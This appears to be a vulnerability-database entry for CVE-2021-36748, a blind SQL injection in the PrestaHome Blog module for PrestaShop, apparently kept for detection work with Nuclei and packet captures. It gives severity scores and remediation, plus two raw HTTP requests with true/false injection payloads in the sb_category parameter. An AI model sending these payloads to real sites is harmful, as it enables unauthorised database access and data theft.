| Title | PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection |
|---|---|
| Author | whoever |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. |
| Remediation | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.83038 |
| CVE ID | CVE-2021-36748 |
| CWE ID | CWE-89 |
| Tags | cve2021 cve prestashop prestahome sqli cms vuln |
PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/10.0
Connection: close
Accept-Encoding: gzip
GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-36748.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-36748.pcap
N/AN/A